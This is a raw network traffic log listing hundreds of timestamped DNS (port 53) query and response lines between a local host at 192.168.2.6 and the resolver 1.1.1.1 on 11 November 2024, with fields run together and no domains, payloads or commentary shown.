                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.318696976 CET6445653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.318867922 CET53519691.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.318886042 CET53630721.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.319479942 CET6174453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.320086956 CET6317653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.320265055 CET53639571.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.320868015 CET5526253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.321221113 CET53539611.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.321660995 CET53503391.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.932956934 CET5107053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.932956934 CET5353353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.933310032 CET53538791.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.933324099 CET53650241.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.933641911 CET53515781.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.934282064 CET53646011.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.934662104 CET5553053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.935009956 CET5943753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.935286999 CET53594631.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.936816931 CET5164553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.936939001 CET5565553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.937114000 CET5155653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.937792063 CET5782553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.938445091 CET5610253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.939040899 CET5279653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.939616919 CET6535653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.940280914 CET53640371.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.940352917 CET6165953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.940359116 CET53591131.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.941092968 CET5309853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.941097021 CET53532641.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.942464113 CET6384953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.943368912 CET53535331.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.945297003 CET6288053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.945969105 CET53555301.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.946369886 CET53516451.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.947618008 CET53515561.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.947695971 CET53578251.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.948152065 CET53556551.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.949703932 CET53616591.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.950565100 CET53653561.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.952284098 CET53548101.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.952294111 CET53638491.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.955398083 CET53628801.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.962117910 CET53639181.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.965176105 CET53510701.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.965455055 CET53594371.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.970374107 CET53561021.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.970706940 CET53527961.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.972506046 CET53530981.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.091742039 CET5569953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.093242884 CET5164453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.097095013 CET6460153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.098541021 CET6079053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.099153042 CET6211253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.099833012 CET5427353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.100966930 CET53556991.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.102901936 CET53516441.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.106515884 CET53607901.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.106527090 CET53646011.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.109582901 CET53542731.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.110142946 CET53621121.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.116739035 CET6102053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.117013931 CET5618253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.126447916 CET53610201.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.131731033 CET5935453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.132460117 CET6244353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.135940075 CET53561821.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.140542984 CET5498653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.140784025 CET4916153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.141047955 CET5535353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.141236067 CET5852953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.142420053 CET53624431.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.151768923 CET53491611.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.154117107 CET5738753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.159502029 CET6483153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.160288095 CET6051753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.160830975 CET6328953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.161756039 CET6482453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.162058115 CET5617753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.164088011 CET53573871.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.164387941 CET53593541.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.165249109 CET5193753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.165657043 CET6465753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.166671991 CET5000153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.166709900 CET5596553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.166915894 CET5308553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.168169022 CET5229953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.169223070 CET6500453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.169253111 CET53561771.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.169264078 CET53648311.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.169935942 CET5393453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.171504021 CET53632891.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.171710968 CET53648241.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.172005892 CET53519371.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.172063112 CET53553531.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.172072887 CET53585291.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.173027992 CET53549861.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.176359892 CET53646571.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.176398039 CET53530851.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.177973032 CET53522991.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.178251028 CET53650041.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.179398060 CET53539341.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.182012081 CET6045353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.183120012 CET5283553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.183568954 CET6121253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.187236071 CET6349253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.187482119 CET5442953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.187705040 CET6152753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.187939882 CET5887553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.192068100 CET53605171.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.192078114 CET53528351.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.193635941 CET53612121.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.115174055 CET53559861.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.115185022 CET53584631.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.115461111 CET53527401.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.115487099 CET53557161.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.115748882 CET53506271.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.115758896 CET53653861.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.115850925 CET53546991.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.116349936 CET53565281.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.116810083 CET53633791.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.117441893 CET53645491.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.117453098 CET53522421.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.117461920 CET53495811.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.117471933 CET53511711.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.117486000 CET53615451.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.117496014 CET53624351.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.117505074 CET53503081.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.117515087 CET53635371.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.117523909 CET53576491.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.117532969 CET53512871.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.118015051 CET53508981.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.118025064 CET53629301.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.118035078 CET53526751.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.118045092 CET53493331.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.118060112 CET53496541.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.118068933 CET53569171.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.118078947 CET53602831.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.118942976 CET53608421.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.118952990 CET53503601.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.118962049 CET53653621.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.119601965 CET53548101.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.119618893 CET53551191.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.119837999 CET53538631.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.119848013 CET53594891.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.120868921 CET53508681.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.125905037 CET53608961.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.126437902 CET53597401.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.128674030 CET53615691.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.136225939 CET53628561.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.137476921 CET53620401.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.137490034 CET53508451.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.138312101 CET53638621.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.138323069 CET53504731.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.138334990 CET53491681.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.138613939 CET53528751.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.138667107 CET53568601.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.138676882 CET53600321.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.141021967 CET53509321.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.141032934 CET53576781.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.141043901 CET53597121.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.141052961 CET53538851.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.141063929 CET53637461.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.141078949 CET53603061.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.141089916 CET53602101.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.141100883 CET53532181.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.141112089 CET53631661.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.141122103 CET53566011.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.141758919 CET53622911.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.142385006 CET53609141.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.539639950 CET5308453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.546529055 CET5648953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.551462889 CET53530841.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.553680897 CET5207353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.554414988 CET6522553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.554748058 CET5206353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.558689117 CET5821753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.561511993 CET4984253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.564273119 CET6467653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.564970970 CET5047253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.565393925 CET53520631.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.565929890 CET6114253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.568120956 CET5830053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.568183899 CET5407153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.568700075 CET5459653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.569159031 CET53582171.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.569200039 CET6518453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.569232941 CET6172553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.569973946 CET5070253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.574381113 CET5810053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.575354099 CET53583001.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.575969934 CET53646761.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.578242064 CET53564891.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.578380108 CET53540711.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.579567909 CET53611421.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.579581022 CET53545961.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.579859018 CET53651841.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.579910040 CET53617251.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.580322981 CET5139053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.581923008 CET53507021.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.584772110 CET5475953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.585458994 CET53652251.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.585496902 CET5611153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.591262102 CET5579453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.595086098 CET53498421.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.595226049 CET53504721.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.601490974 CET4951253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.601685047 CET6052953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.601984024 CET5738053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.602124929 CET6394553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.602283955 CET5273853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.602457047 CET6188853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.602457047 CET6375453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.602606058 CET5859253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.602627993 CET5982053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.618377924 CET53532031.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.625642061 CET5702053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.630563021 CET53650291.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.630585909 CET53504411.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.631006956 CET6386153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.631377935 CET53588151.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.631393909 CET53553071.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.631993055 CET5433953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.632917881 CET53561501.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.633564949 CET53523551.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.634763956 CET53570201.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.643975973 CET4956953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.646739960 CET53551901.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.649893999 CET5923053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.650563955 CET6192253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.651367903 CET5260953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.651726961 CET5515253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.656425953 CET53495691.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.656876087 CET6546253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.659848928 CET53619221.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.660077095 CET53592301.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.660707951 CET5879753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.661211967 CET53638611.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.662105083 CET53551521.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.662133932 CET53526091.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.663459063 CET5869053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.663624048 CET53543391.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.665916920 CET5723253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.666281939 CET6046353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.666378021 CET5126853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.666510105 CET6167253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.666995049 CET5873453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.667071104 CET6468553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.667223930 CET5811353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.667272091 CET5759553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.667309046 CET53654621.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.667408943 CET5147953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.667500019 CET5287653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.667630911 CET5668153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.667748928 CET5483953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.667803049 CET5865853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.668469906 CET6503653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.668544054 CET5565753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.669047117 CET4921153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.669089079 CET6009753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.669281006 CET5808053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.669294119 CET5494253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.669821024 CET5610553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.670125008 CET5253253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.672384977 CET5511553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.674901009 CET53581131.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.674932003 CET53586901.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.676162958 CET53587341.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.676605940 CET53512681.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.676700115 CET53528761.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.676717997 CET53575951.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.677752018 CET53548391.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.678745985 CET53566811.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.678761005 CET53650361.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.678774118 CET53587971.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.679256916 CET53580801.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.679584026 CET53492111.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.680428028 CET53525321.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.680442095 CET53549421.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.682497025 CET53551151.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.684928894 CET53604631.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.689199924 CET53600971.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.698009968 CET53572321.1.1.1192.168.2.6
